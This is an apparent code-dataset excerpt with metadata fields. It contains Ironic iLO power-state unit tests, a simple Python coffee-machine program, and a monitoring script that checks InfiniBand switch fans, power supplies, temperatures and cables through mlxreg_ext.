ilo_power._set_power_state,
task,
states.REBOOT)
ilo_mock_object.reset_server.assert_called_once_with()
@mock.patch.object(ilo_common, 'get_server_post_state', spec_set=True,
autospec=True)
def test__set_power_state_reboot_ok(self, get_post_mock,
get_ilo_object_mock):
ilo_mock_object = get_ilo_object_mock.return_value
get_post_mock.side_effect = (['FinishedPost', 'PowerOff',
'FinishedPost'])
with task_manager.acquire(self.context, self.node.uuid,
shared=True) as task:
ilo_power._set_power_state(task, states.REBOOT)
get_post_mock.assert_called_with(task.node)
ilo_mock_object.reset_server.assert_called_once_with()
@mock.patch.object(ilo_common, 'get_server_post_state', spec_set=True,
autospec=True)
def test__set_power_state_off_fail(self, get_post_mock,
get_ilo_object_mock):
ilo_mock_object = get_ilo_object_mock.return_value
get_post_mock.side_effect = (['FinishedPost', 'FinishedPost',
'FinishedPost', 'FinishedPost',
'FinishedPost'])
with task_manager.acquire(self.context, self.node.uuid,
shared=True) as task:
self.assertRaises(exception.PowerStateFailure,
ilo_power._set_power_state,
task,
states.POWER_OFF)
get_post_mock.assert_called_with(task.node)
ilo_mock_object.hold_pwr_btn.assert_called_once_with()
@mock.patch.object(ilo_common, 'get_server_post_state', spec_set=True,
autospec=True)
def test__set_power_state_on_ok(self, get_post_mock, get_ilo_object_mock):
ilo_mock_object = get_ilo_object_mock.return_value
get_post_mock.side_effect = ['PowerOff', 'PowerOff', 'FinishedPost']
target_state = states.POWER_ON
with task_manager.acquire(self.context, self.node.uuid,
shared=True) as task:
ilo_power._set_power_state(task, target_state)
get_post_mock.assert_called_with(task.node)
ilo_mock_object.set_host_power.assert_called_once_with('ON')
@mock.patch.object(ilo_power.LOG, 'info')
@mock.patch.object(ilo_power, '_attach_boot_iso_if_needed',
spec_set=True, autospec=True)
@mock.patch.object(ilo_common, 'get_server_post_state', spec_set=True,
autospec=True)
def test__set_power_state_soft_reboot_ok(
self, get_post_mock, attach_boot_iso_mock,
log_mock, get_ilo_object_mock):
CONF.set_override('power_wait', 1, 'ilo')
ilo_mock_object = get_ilo_object_mock.return_value
ilo_mock_object.get_host_power_status.return_value = 'ON'
get_post_mock.side_effect = (
['FinishedPost', 'FinishedPost', 'PowerOff', 'PowerOff', 'InPost',
'FinishedPost'])
with task_manager.acquire(self.context, self.node.uuid,
shared=True) as task:
ilo_power._set_power_state(task, states.SOFT_REBOOT, timeout=3)
get_post_mock.assert_called_with(task.node)
ilo_mock_object.press_pwr_btn.assert_called_once_with()
attach_boot_iso_mock.assert_called_once_with(task)
ilo_mock_object.set_host_power.assert_called_once_with('ON')
log_mock.assert_called_once_with(
"The node %(node_id)s operation of '%(state)s' "
"is completed in %(time_consumed)s seconds.",
{'state': 'soft rebooting', 'node_id': task.node.uuid,
'time_consumed': 2})
@mock.patch.object(ilo_power.LOG, 'info')
@mock.patch.object(ilo_power, '_attach_boot_iso_if_needed',
spec_set=True, autospec=True)
@mock.patch.object(ilo_common, 'get_server_post_state', spec_set=True,
autospec=True)
def test__set_power_state_soft_reboot_ok_initial_power_off(
self, get_post_mock, attach_boot_iso_mock,
log_mock, get_ilo_object_mock):
CONF.set_override('power_wait', 1, 'ilo')
ilo_mock_object = get_ilo_object_mock.return_value
ilo_mock_object.get_host_power_status.return_value = 'OFF'
get_post_mock.side_effect = ['FinishedPost', 'PowerOff',
'FinishedPost']
with task_manager.acquire(self.context, self.node.uuid,
shared=True) as task:
ilo_power._set_power_state(task, states.SOFT_REBOOT, timeout=3)
get_post_mock.assert_called_with(task.node)
attach_boot_iso_mock.assert_called_once_with(task)
ilo_mock_object.set_host_power.assert_called_once_with('ON')
log_mock.assert_called_once_with(
"The node %(node_id)s operation of '%(state)s' "
"is completed in %(time_consumed)s seconds.",
{'state': 'power on', 'node_id': task.node.uuid,
'time_consumed': 1})
@mock.patch.object(ilo_power.LOG, 'info')
@mock.patch.object(ilo_power, '_attach_boot_iso_if_needed',
spec_set=True, autospec=True)
@mock.patch.object(ilo_common, 'get_server_post_state', spec_set=True,
autospec=True)
def test__set_power_state_soft_reboot_fail_to_off(
self, get_post_mock, attach_boot_iso_mock,
log_mock, get_ilo_object_mock):
CONF.set_override('power_wait', 1, 'ilo')
exc = ilo_error.IloError('error')
ilo_mock_object = get_ilo_object_mock.return_value
ilo_mock_object.get_host_power_status.return_value = 'ON'
ilo_mock_object.press_pwr_btn.side_effect = exc
with task_manager.acquire(self.context, self.node.uuid,
shared=True) as task:
self.assertRaises(exception.IloOperationError,
ilo_power._set_power_state,
task, states.SOFT_REBOOT, timeout=3)
ilo_mock_object.press_pwr_btn.assert_called_once_with()
self.assertFalse(get_post_mock.called)
self.assertFalse(attach_boot_iso_mock.called)
self.assertFalse(log_mock.called)
@mock.patch.object(ilo_power.LOG, 'info')
@mock.patch.object(ilo_power, '_attach_boot_iso_if_needed',
spec_set=True, autospec=True)
@mock.patch.object(ilo_common, 'get_server_post_state', spec_set=True,
autospec=True)
def test__set_power_state_soft_reboot_fail_to_on(
self, get_post_mock, attach_boot_iso_mock,
log_mock, get_ilo_object_mock):
CONF.set_override('power_wait', 1, 'ilo')
exc = ilo_error.IloError('error')
ilo_mock_object = get_ilo_object_mock.return_value
ilo_mock_object.get_host_power_status.return_value = 'ON'
get_post_mock.side_effect = (
['FinishedPost', 'PowerOff', 'PowerOff', 'InPost',
'InPost', 'InPost', 'InPost', 'InPost'])
ilo_mock_object.press_pwr_btn.side_effect = [None, exc]
with task_manager.acquire(self.context, self.node.uuid,
shared=True) as task:
self.assertRaises(exception.PowerStateFailure,
ilo_power._set_power_state,
task, states.SOFT_REBOOT, timeout=3)
get_post_mock.assert_called_with(task.node)
ilo_mock_object.press_pwr_btn.assert_called_once_with()
ilo_mock_object.set_host_power.assert_called_once_with('ON')
attach_boot_iso_mock.assert_called_once_with(task)
self.assertFalse(log_mock.called)
@mock.patch.object(ilo_power.LOG, 'info')
@mock.patch.object(ilo_power, '_attach_boot_iso_if_needed',
spec_set=True, autospec=True)
@mock.patch.object(ilo_common, 'get_server_post_state', spec_set=True,
autospec=True)
def test__set_power_state_soft_reboot_timeout(
self, get_post_mock, attach_boot_iso_mock,
log_mock, get_ilo_object_mock):
CONF.set_override('power_wait', 1, 'ilo')
ilo_mock_object = get_ilo_object_mock.return_value
ilo_mock_object.get_host_power_status.return_value = 'ON'
get_post_mock.side_effect = ['FinishedPost', 'FinishedPost',
'PowerOff', 'InPost', 'InPost', 'InPost'
'InPost', 'InPost']
with task_manager.acquire(self.context, self.node.uuid,
shared=True) as task:
self.assertRaises(exception.PowerStateFailure,
ilo_power._set_power_state,
task, states.SOFT_REBOOT, timeout=2)
get_post_mock.assert_called_with(task.node)
ilo_mock_object.press_pwr_btn.assert_called_once_with()
ilo_mock_object.set_host_power.assert_called_once_with('ON')
attach_boot_iso_mock.assert_called_once_with(task)
self.assertFalse(log_mock.called)
@mock.patch.object(ilo_power.LOG, 'info')
@mock.patch.object(ilo_common, 'get_server_post_state', spec_set=True,
autospec=True)
def test__set_power_state_soft_power_off_ok(
self, get_post_mock, log_mock, get_ilo_object_mock):
CONF.set_override('power_wait', 1, 'ilo')
ilo_mock_object = get_ilo_object_mock.return_value
get_post_mock.side_effect = ['FinishedPost', 'FinishedPost', 'PowerOff'
'PowerOff', 'PowerOff']
with task_manager.acquire(self.context, self.node.uuid,
shared=True) as task:
ilo_power._set_power_state(task, states.SOFT_POWER_OFF, timeout=3)
get_post_mock.assert_called_with(task.node)
ilo_mock_object.press_pwr_btn.assert_called_once_with()
log_mock.assert_called_once_with(
"The node %(node_id)s operation of '%(state)s' "
"is completed in %(time_consumed)s seconds.",
{'state': 'soft power off', 'node_id': task.node.uuid,
'time_consumed': 2})
@mock.patch.object(ilo_power.LOG, 'info')
@mock.patch.object(ilo_common, 'get_server_post_state', spec_set=True,
autospec=True)
def test__set_power_state_soft_power_off_fail(
self, get_post_mock, log_mock, get_ilo_object_mock):
CONF.set_override('power_wait', 1, 'ilo')
exc = ilo_error.IloError('error')
ilo_mock_object = get_ilo_object_mock.return_value
ilo_mock_object.get_host_power_status.return_value = 'ON'
ilo_mock_object.press_pwr_btn.side_effect = exc
with task_manager.acquire(self.context, self.node.uuid,
shared=True) as task:
self.assertRaises(exception.IloOperationError,
ilo_power._set_power_state,
task, states.SOFT_POWER_OFF, timeout=2)
ilo_mock_object.press_pwr_btn.assert_called_once_with()
self.assertFalse(get_post_mock.called)
self.assertFalse(log_mock.called)
@mock.patch.object(ilo_power.LOG, 'info')
@mock.patch.object(ilo_common, 'get_server_post_state', spec_set=True,
autospec=True)
def test__set_power_state_soft_power_off_timeout(
self, get_post_mock, log_mock, get_ilo_object_mock):
CONF.set_override('power_wait', 1, 'ilo')
ilo_mock_object = get_ilo_object_mock.return_value
ilo_mock_object.get_host_power_status.return_value = 'ON'
get_post_mock.side_effect = ['FinishedPost', 'InPost', 'InPost',
'InPost', 'InPost']
with task_manager.acquire(self.context, self.node.uuid,
shared=True) as task:
self.assertRaises(exception.PowerStateFailure,
ilo_power._set_power_state,
task, states.SOFT_POWER_OFF, timeout=2)
get_post_mock.assert_called_with(task.node)
ilo_mock_object.press_pwr_btn.assert_called_with()
self.assertFalse(log_mock.called)
@mock.patch.object(manager_utils, 'node_set_boot_device', spec_set=True,
autospec=True)
@mock.patch.object(ilo_common, 'setup_vmedia_for_boot', spec_set=True,
autospec=True)
def test__attach_boot_iso_if_needed(
self, setup_vmedia_mock, set_boot_device_mock,
get_ilo_object_mock):
with task_manager.acquire(self.context, self.node.uuid,
shared=True) as task:
task.node.provision_state = states.ACTIVE
task.node.instance_info['ilo_boot_iso'] = 'boot-iso'
ilo_power._attach_boot_iso_if_needed(task)
setup_vmedia_mock.assert_called_once_with(task, 'boot-iso')
set_boot_device_mock.assert_called_once_with(task,
boot_devices.CDROM)
@mock.patch.object(manager_utils, 'node_set_boot_device', spec_set=True,
autospec=True)
@mock.patch.object(ilo_common, 'setup_vmedia_for_boot', spec_set=True,
autospec=True)
def test__attach_boot_iso_if_needed_on_rebuild(
self, setup_vmedia_mock, set_boot_device_mock,
get_ilo_object_mock):
with task_manager.acquire(self.context, self.node.uuid,
shared=True) as task:
task.node.provision_state = states.DEPLOYING
task.node.instance_info['ilo_boot_iso'] = 'boot-iso'
ilo_power._attach_boot_iso_if_needed(task)
self.assertFalse(setup_vmedia_mock.called)
self.assertFalse(set_boot_device_mock.called)
class IloPowerTestCase(test_common.BaseIloTest):
def test_get_properties(self):
expected = ilo_common.COMMON_PROPERTIES
with task_manager.acquire(self.context, self.node.uuid,
shared=True) as task:
self.assertEqual(expected, task.driver.power.get_properties())
@mock.patch.object(ilo_common, 'parse_driver_info', spec_set=True,
autospec=True)
def test_validate(self, mock_drvinfo):
with task_manager.acquire(self.context, self.node.uuid,
shared=True) as task:
task.driver.power.validate(task)
mock_drvinfo.assert_called_once_with(task.node)
@mock.patch.object(ilo_common, 'parse_driver_info', spec_set=True,
autospec=True)
def test_validate_fail(self, mock_drvinfo):
side_effect = exception.InvalidParameterValue("Invalid Input")
mock_drvinfo.side_effect = side_effect
with task_manager.acquire(self.context, self.node.uuid,
shared=True) as task:
self.assertRaises(exception.InvalidParameterValue,
task.driver.power.validate,
task)
@mock.patch.object(ilo_power, '_get_power_state', spec_set=True,
autospec=True)
def test_get_power_state(self, mock_get_power):
with task_manager.acquire(self.context, self.node.uuid,
shared=True) as task:
mock_get_power.return_value = states.POWER_ON
self.assertEqual(states.POWER_ON,
task.driver.power.get_power_state(task))
mock_get_power.assert_called_once_with(task.node)
@mock.patch.object(ilo_power, '_set_power_state', spec_set=True,
autospec=True)
def _test_set_power_state(self, mock_set_power, timeout=None):
mock_set_power.return_value = states.POWER_ON
with task_manager.acquire(self.context, self.node.uuid,
shared=False) as task:
task.driver.power.set_power_state(task, states.POWER_ON,
timeout=timeout)
mock_set_power.assert_called_once_with(task, states.POWER_ON,
timeout=timeout)
def test_set_power_state_no_timeout(self):
self._test_set_power_state(timeout=None)
def test_set_power_state_timeout(self):
self._test_set_power_state(timeout=13)
@mock.patch.object(ilo_power, '_set_power_state', spec_set=True,
autospec=True)
@mock.patch.object(ilo_power, '_get_power_state', spec_set=True,
autospec=True)
def _test_reboot(
self, mock_get_power, mock_set_power,
timeout=None):
mock_get_power.return_value = states.POWER_ON
with task_manager.acquire(self.context, self.node.uuid,
shared=False) as task:
task.driver.power.reboot(task, timeout=timeout)
mock_get_power.assert_called_once_with(task.node)
mock_set_power.assert_called_once_with(
task, states.REBOOT, timeout=timeout)
def test_reboot_no_timeout(self):
self._test_reboot(timeout=None)
def test_reboot_with_timeout(self):
self._test_reboot(timeout=100)
def test_get_supported_power_states(self):
with task_manager.acquire(self.context, self.node.uuid,
shared=False) as task:
expected = [states.POWER_OFF, states.POWER_ON, states.REBOOT,
states.SOFT_POWER_OFF, states.SOFT_REBOOT]
self.assertEqual(
sorted(expected),
sorted(task.driver.power.
get_supported_power_states(task)))
|
en
| 0.82379
|
# Copyright 2014 Hewlett-Packard Development Company, L.P. # All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. Test class for IloPower module.
| 1.728857
| 2
|
cofee machine/main.py
|
marcus1666/Python-Projects
| 2
|
6628485
|
from extras import MENU, resources
class machine():
    """A simple coffee machine backed by the module-level MENU and resources."""

    def cash(self, product):
        """Collect coins for *product*.

        Returns False when the inserted amount is less than the price;
        otherwise records the sale in resources["money"] and returns the
        change owed (which may be exactly 0.0).
        """
        print("Please insert a coin")
        quarters = int(input("How many quarters? "))
        dimes = int(input("How many dimes: "))
        nickles = int(input("How many nickles: "))
        pennies = int(input("How many pennies: "))
        user_amount = (quarters * 0.25) + (dimes * 0.1) + (nickles * 0.05) + (pennies * 0.01)
        value = MENU[product]
        if user_amount < value["cost"]:
            return False
        resources["money"] += value["cost"]
        return user_amount - value["cost"]

    def resources_maths(self, product):
        """Return True when there is enough stock left to make *product*."""
        # Same thresholds as the original nested-if pyramid, expressed as data.
        required = {
            "espresso": {"water": 50, "coffee": 18},
            "latte": {"water": 200, "coffee": 24, "milk": 150},
            "cappuccino": {"water": 250, "coffee": 24, "milk": 100},
        }.get(product)
        if required is None:
            # Unknown drink: report it as un-makeable (falsy, like before).
            return False
        return all(resources[item] >= amount for item, amount in required.items())

    def serve(self, product):
        """Announce the drink and deduct its ingredients from resources."""
        print(f"Here is your {product} ☕, Enjoy!!!")
        ingredients = MENU[product]["ingredients"]
        for item in ("water", "milk", "coffee"):
            if item in ingredients:
                resources[item] -= ingredients[item]

    def prompt(self, user_input):
        """Handle one command; return False only for 'off' (switch off)."""
        if user_input == "off":
            return False
        if user_input == "resources":
            print(f"Water: {resources['water']}ml")
            print(f"Milk: {resources['milk']}ml")
            print(f"Coffee: {resources['coffee']}g")
            print(f"Money: ${resources['money']}")
        elif self.resources_maths(user_input):
            change = self.cash(user_input)
            # BUG FIX: the original tested `cash == False`, which is also
            # true for exact payment (0.0 == False), so a customer paying
            # the exact price was refused even though the sale had already
            # been added to resources["money"].  `is False` only matches
            # the insufficient-funds sentinel.
            if change is False:
                print("Your money is not enough")
            else:
                print(f"Have your change of ${change}")
                self.serve(user_input)
        else:
            print(f"There are not enough ingredients to make your {user_input}")
def main():
    """Run the coffee-machine command loop until the user types 'off'."""
    # One machine for the whole session; the original needlessly created a
    # fresh instance on every loop iteration.
    engine = machine()
    on = True
    while on:
        user_input = input("What would you like? (espresso/latte/cappuccino): ").lower()
        # prompt() returns False only for 'off'; use identity, not equality.
        if engine.prompt(user_input) is False:
            on = False


if __name__ == '__main__':
    main()
|
from extras import MENU, resources
class machine():
    """A simple coffee machine backed by the module-level MENU and resources."""

    def cash(self, product):
        """Collect coins for *product*.

        Returns False when the inserted amount is less than the price;
        otherwise records the sale in resources["money"] and returns the
        change owed (which may be exactly 0.0).
        """
        print("Please insert a coin")
        quarters = int(input("How many quarters? "))
        dimes = int(input("How many dimes: "))
        nickles = int(input("How many nickles: "))
        pennies = int(input("How many pennies: "))
        user_amount = (quarters * 0.25) + (dimes * 0.1) + (nickles * 0.05) + (pennies * 0.01)
        value = MENU[product]
        if user_amount < value["cost"]:
            return False
        resources["money"] += value["cost"]
        return user_amount - value["cost"]

    def resources_maths(self, product):
        """Return True when there is enough stock left to make *product*."""
        # Same thresholds as the original nested-if pyramid, expressed as data.
        required = {
            "espresso": {"water": 50, "coffee": 18},
            "latte": {"water": 200, "coffee": 24, "milk": 150},
            "cappuccino": {"water": 250, "coffee": 24, "milk": 100},
        }.get(product)
        if required is None:
            # Unknown drink: report it as un-makeable (falsy, like before).
            return False
        return all(resources[item] >= amount for item, amount in required.items())

    def serve(self, product):
        """Announce the drink and deduct its ingredients from resources."""
        print(f"Here is your {product} ☕, Enjoy!!!")
        ingredients = MENU[product]["ingredients"]
        for item in ("water", "milk", "coffee"):
            if item in ingredients:
                resources[item] -= ingredients[item]

    def prompt(self, user_input):
        """Handle one command; return False only for 'off' (switch off)."""
        if user_input == "off":
            return False
        if user_input == "resources":
            print(f"Water: {resources['water']}ml")
            print(f"Milk: {resources['milk']}ml")
            print(f"Coffee: {resources['coffee']}g")
            print(f"Money: ${resources['money']}")
        elif self.resources_maths(user_input):
            change = self.cash(user_input)
            # BUG FIX: the original tested `cash == False`, which is also
            # true for exact payment (0.0 == False), so a customer paying
            # the exact price was refused even though the sale had already
            # been added to resources["money"].  `is False` only matches
            # the insufficient-funds sentinel.
            if change is False:
                print("Your money is not enough")
            else:
                print(f"Have your change of ${change}")
                self.serve(user_input)
        else:
            print(f"There are not enough ingredients to make your {user_input}")
def main():
    """Run the coffee-machine command loop until the user types 'off'."""
    # One machine for the whole session; the original needlessly created a
    # fresh instance on every loop iteration.
    engine = machine()
    on = True
    while on:
        user_input = input("What would you like? (espresso/latte/cappuccino): ").lower()
        # prompt() returns False only for 'off'; use identity, not equality.
        if engine.prompt(user_input) is False:
            on = False


if __name__ == '__main__':
    main()
|
zh
| 0.08132
|
#for latte
| 4.137218
| 4
|
check_ib_switch.py
|
guilbaults/check_ib_switch
| 1
|
6628486
|
<filename>check_ib_switch.py
import re
import sys
import argparse
import logging
import subprocess
import itertools
def parse_table_hex(lines):
    """Parse 'name | 0xVALUE' mlxreg table rows into a {name: int} mapping."""
    parsed = {}
    for row in lines:
        match = re.match(r'(.*?)\s*\| (.*)', row)
        parsed[str(match.group(1))] = int(match.group(2), 16)
    return parsed
def parse_table_ascii(lines):
    """Decode 'name[i] | 0xHEX' mlxreg rows into a {name: str} mapping.

    Indexed rows (name[0], name[1], ...) are decoded piecewise and
    concatenated under the bare field name; NUL padding is stripped.
    """
    decoded = {}
    for row in lines:
        match = re.match(r'(.*?)(\[\d+\])?\s*\| (.*)', row)
        field = str(match.group(1))
        raw = bytearray.fromhex(match.group(3)[2:]).decode()
        piece = str(raw.replace(u'\x00', '').strip())
        if match.group(2) and field in decoded.keys():
            decoded[field] = decoded[field] + piece
        else:
            decoded[field] = piece
    return decoded
def mlxreg_ext_fans(lid, fan_id):
    """Read the MFSM (fan speed) register for one tacho via mlxreg_ext.

    Returns a dict of register fields (e.g. 'rpm') parsed as integers.
    """
    cmdargs = ['mlxreg_ext', '-d', 'lid-{0}'.format(lid), '--reg_name',
               'MFSM', '--get', '--indexes', 'tacho={}'.format(fan_id)]
    stdout, stderr = subprocess.Popen(cmdargs,
                                      stdout=subprocess.PIPE,
                                      stderr=subprocess.PIPE).communicate()
    # Drop the 4 header lines and the final line of the table output.
    return parse_table_hex(stdout.decode("utf-8").splitlines()[4:-1])
def mlxreg_ext_temp(lid, sensor_id):
    """Read the MTMP (temperature) register for one sensor via mlxreg_ext.

    Returns a dict of register fields (e.g. 'temperature') as integers.
    """
    cmdargs = ['mlxreg_ext', '-d', 'lid-{0}'.format(lid), '--reg_name',
               'MTMP', '--get', '--indexes',
               'sensor_index={}'.format(sensor_id)]
    stdout, stderr = subprocess.Popen(cmdargs,
                                      stdout=subprocess.PIPE,
                                      stderr=subprocess.PIPE).communicate()
    # Drop the 4 header lines and the final line of the table output.
    return parse_table_hex(stdout.decode("utf-8").splitlines()[4:-1])
def mlxreg_ext_psu(lid):
    """Read the MSPS register and extract the wattage of each PSU.

    Returns a dict keyed 'watt_<n>' with the wattage as an integer.
    """
    cmdargs = ['mlxreg_ext', '-d', 'lid-{0}'.format(lid), '--reg_name',
               'MSPS', '--get']
    stdout, stderr = subprocess.Popen(cmdargs,
                                      stdout=subprocess.PIPE,
                                      stderr=subprocess.PIPE).communicate()
    psus = {}
    lines = stdout.decode("utf-8").splitlines()[4:-1]
    for line in lines:
        # PSU Watt with 0x8 prepended
        m_watt = re.match(r'psu(\d)\[2\]\s+\| 0x8(.*)', line)
        if m_watt:
            psus['watt_' + m_watt.group(1)] = int(m_watt.group(2), 16)
    return psus
def mlxreg_ext(lid, register):
    """Read an ASCII-valued register (e.g. MSGI) via mlxreg_ext.

    Returns the decoded fields as a {name: str} mapping.
    """
    cmdargs = ['mlxreg_ext', '-d', 'lid-{0}'.format(lid), '--reg_name',
               register, '--get']
    stdout, stderr = subprocess.Popen(cmdargs,
                                      stdout=subprocess.PIPE,
                                      stderr=subprocess.PIPE).communicate()
    # Drop the 4 header lines and the final line of the table output.
    return parse_table_ascii(stdout.decode("utf-8").splitlines()[4:-1])
def ascii_field(name):
    """Return True when the line refers to an ASCII-encoded vendor field."""
    ascii_tags = ('vendor_name', 'vendor_sn', 'vendor_pn', 'vendor_rev')
    return any(tag in name for tag in ascii_tags)
def mlxreg_ext_ports(lid, port_id):
    """Read the PDDR (port diagnostics) register for one local port.

    ASCII vendor_* fields are decoded as text; all other fields are
    parsed as integers.  Returns a single merged dict.
    """
    index = 'local_port={},pnat=0x0,page_select=0x3,group_opcode=0x0'
    cmdargs = ['mlxreg_ext', '-d', 'lid-{0}'.format(lid), '--reg_name',
               'PDDR', '--get', '--indexes', index.format(port_id)]
    stdout, stderr = subprocess.Popen(cmdargs,
                                      stdout=subprocess.PIPE,
                                      stderr=subprocess.PIPE).communicate()
    lines = stdout.decode("utf-8").splitlines()[4:-1]
    # Split the table into ASCII and numeric rows and parse each kind.
    info = parse_table_ascii(filter(ascii_field, lines))
    info.update(parse_table_hex(itertools.filterfalse(ascii_field, lines)))
    return info
def guid_to_lid():
    """Map switch GUIDs to integer LIDs by parsing `ibswitches` output."""
    stdout, stderr = subprocess.Popen(['ibswitches'],
                                      stdout=subprocess.PIPE,
                                      stderr=subprocess.PIPE).communicate()
    lids = {}  # store GUID to LID mapping
    for line in stdout.decode("utf-8").splitlines():
        logging.debug('guid_to_lid: %s', line)
        # Each line contains '<guid> ports ... lid <n>'.
        m = re.match(r'.*(0x.*) ports.* lid (\d+)', line)
        lids[m.group(1)] = int(m.group(2))
    return lids
def print_info(info):
    """Print every collected informational line on its own stdout line."""
    for entry in info:
        print(entry)
parser = argparse.ArgumentParser(description='')
parser.add_argument("-v", "--verbose", action="store_true",
                    help="increase output verbosity")
parser.add_argument("--guid", help="Switch GUID to check",
                    action="store")
parser.add_argument("--node_name_map", help="Node name map file path",
                    action="store")
parser.add_argument("--name", help="Switch name used in node-name-map",
                    action="store")
parser.add_argument("--fan", help="Check fans", action="store_true")
parser.add_argument("--cable", help="Check cables", action="store_true")
parser.add_argument("--psu", help="Check PSUs", action="store_true")
parser.add_argument("--temp", help="Check temperatures", action="store_true")
args = parser.parse_args()

if args.verbose:
    logging.basicConfig(level=logging.DEBUG)

# BUG FIX: argparse 'store' options default to None (never False), so the
# original `args.name is False and args.guid is False` guard could never
# fire and the script crashed later instead of exiting cleanly.
if args.name is None and args.guid is None:
    print('Need to use the GUID or the switch name')
    sys.exit(3)
if args.name:
    # Looking a switch up by name requires the GUID<->name map file.
    if args.node_name_map is None:
        print('node_name_map need to be defined')
        sys.exit(3)
guid_name = {}
name_guid = {}
if args.node_name_map:
    # Map file lines look like: 0x<guid> "<name>"
    with open(args.node_name_map) as f:
        for line in f:
            m = re.match(r'(0x.*) "(.*)"', line)
            if m:
                guid_name[m.group(1)] = m.group(2)
                name_guid[m.group(2)] = m.group(1)
guids = guid_to_lid()
if args.guid:
    # received a GUID, check in node name map
    guid = args.guid
    if args.guid in guid_name:
        name = guid_name[args.guid]
    else:
        name = args.guid
else:
    # Received the name, need to get the GUID from the file
    guid = name_guid[args.name]
    name = args.name
lid = guids[guid]
# Accumulators for the Nagios-style output assembled below.
perfdata = []
criticals = []
warnings = []
info = []
# MSGI holds the switch identity (product name, PN, revision, SN).
sw = mlxreg_ext(lid, 'MSGI')
info.append('GUID={} LID={} Name={}'.format(guid, lid, name))
info.append('{} PN={} Rev={} SN={}'.format(sw['product_name'],
    sw['part_number'], sw['revision'], sw['serial_number']))
if args.psu:
    # Two PSUs (0 and 1): very low wattage means the PSU is down; unusually
    # high wattage suggests it may be carrying the whole load alone.
    psus = mlxreg_ext_psu(lid)
    for i in range(2):
        psu_watt = 'watt_{}'.format(i)
        if psus[psu_watt] < 30:
            criticals.append('PSU{} is down with {}W'.format(
                i, psus[psu_watt]))
        if psus[psu_watt] > 100:
            warnings.append('PSU{} might be alone with {}W'.format(
                i, psus[psu_watt]))
        perfdata.append('PSU{psu}_W={watt};;30:100;;'.format(
            psu=i,
            watt=psus[psu_watt],
        ))
if args.fan:
    # Fans are numbered 1..8; flag speeds outside the 4500-13000 RPM band.
    for i in range(1, 9):
        fan_info = mlxreg_ext_fans(lid, i)
        rpm = fan_info['rpm']
        if rpm < 4500:
            criticals.append('Fan #{} is too slow, {} RPM'.format(i, rpm))
        elif rpm > 13000:
            criticals.append('Fan #{} is too fast, {} RPM'.format(i, rpm))
        perfdata.append('Fan{fan}_RPM={speed};;{MIN_FAN}:{MAX_FAN};;'.format(
            fan=i,
            speed=rpm,
            MIN_FAN=4500,
            MAX_FAN=13000,
        ))
if args.temp:
    # Sensors 1..6; the raw value is divided by 10, so it appears to be
    # reported in tenths of a degree Celsius.
    for i in range(1, 7):
        temp_info = mlxreg_ext_temp(lid, i)
        temperature = temp_info['temperature']/10
        if temperature > 45:
            criticals.append('Temperature of #{} is too high, {}C'.format(
                i, temperature))
        perfdata.append('Temperature{sensor}_C={temp};;5:{MAX_TEMP};;'.format(
            sensor=i,
            temp=temperature,
            MAX_TEMP=45,
        ))
if args.cable:
    # Ports 1..36; the raw cable temperature is divided by 256, so it
    # appears to be reported in 1/256 degree units.
    for i in range(1, 37):
        cable = mlxreg_ext_ports(lid, i)
        temperature = cable['temperature']/256
        if temperature > 70:
            criticals.append('Cable {} is overtemp at {}C > 70C'.format(
                i, temperature))
        info.append('Cable #{}, {} PN={} SN={} Rev={} FW={}, {}M'.format(
            i,
            cable['vendor_name'],
            cable['vendor_pn'],
            cable['vendor_sn'],
            cable['vendor_rev'],
            cable['fw_version'],
            cable['cable_length'])
        )
# BUG FIX: the original tested `len(...) > 1`, so a single critical (or a
# single warning) reported "Switch OK" and exited 0.  Any critical must be
# CRITICAL (exit 2) and any warning must be WARNING (exit 1).
if len(criticals) > 0:
    # BUG FIX: criticals and warnings were joined independently and then
    # concatenated with no separator between the two groups.
    print('{criticals} | {perfdata}'.format(
        criticals=', '.join(criticals + warnings),
        perfdata=' '.join(perfdata),
    ))
    print_info(info)
    sys.exit(2)
elif len(warnings) > 0:
    print('{warnings} | {perfdata}'.format(
        warnings=', '.join(warnings),
        perfdata=' '.join(perfdata),
    ))
    print_info(info)
    sys.exit(1)
else:
    print('Switch OK | {perfdata}'.format(
        perfdata=' '.join(perfdata),
    ))
    print_info(info)
    sys.exit(0)
|
<filename>check_ib_switch.py
import re
import sys
import argparse
import logging
import subprocess
import itertools
def parse_table_hex(lines):
    """Parse 'name | 0xVALUE' mlxreg table rows into a {name: int} mapping."""
    parsed = {}
    for row in lines:
        match = re.match(r'(.*?)\s*\| (.*)', row)
        parsed[str(match.group(1))] = int(match.group(2), 16)
    return parsed
def parse_table_ascii(lines):
    """Decode 'name | 0x<hex>' rows whose payload is ASCII text.

    The hex payload (after the '0x' prefix) is decoded to text, NUL
    bytes are dropped and the result is stripped.  Indexed rows such as
    'name[0]', 'name[1]' are concatenated in order under the bare name.
    """
    row_re = re.compile(r'(.*?)(\[\d+\])?\s*\| (.*)')
    decoded = {}
    for row in lines:
        match = row_re.match(row)
        key = str(match.group(1))
        raw = bytearray.fromhex(match.group(3)[2:]).decode()
        text = str(raw.replace(u'\x00', '').strip())
        if match.group(2) and key in decoded:
            # Continuation chunk of a multi-part string field.
            decoded[key] += text
        else:
            decoded[key] = text
    return decoded
def mlxreg_ext_fans(lid, fan_id):
    """Query the MFSM (fan tachometer) register for one fan of a switch LID."""
    command = [
        'mlxreg_ext', '-d', 'lid-{0}'.format(lid),
        '--reg_name', 'MFSM', '--get',
        '--indexes', 'tacho={}'.format(fan_id),
    ]
    proc = subprocess.Popen(command, stdout=subprocess.PIPE,
                            stderr=subprocess.PIPE)
    out, _ = proc.communicate()
    # Drop the 4-line header and the trailing separator before parsing.
    return parse_table_hex(out.decode("utf-8").splitlines()[4:-1])
def mlxreg_ext_temp(lid, sensor_id):
    """Query the MTMP (temperature) register for one sensor of a switch LID."""
    command = [
        'mlxreg_ext', '-d', 'lid-{0}'.format(lid),
        '--reg_name', 'MTMP', '--get',
        '--indexes', 'sensor_index={}'.format(sensor_id),
    ]
    proc = subprocess.Popen(command, stdout=subprocess.PIPE,
                            stderr=subprocess.PIPE)
    out, _ = proc.communicate()
    # Drop the 4-line header and the trailing separator before parsing.
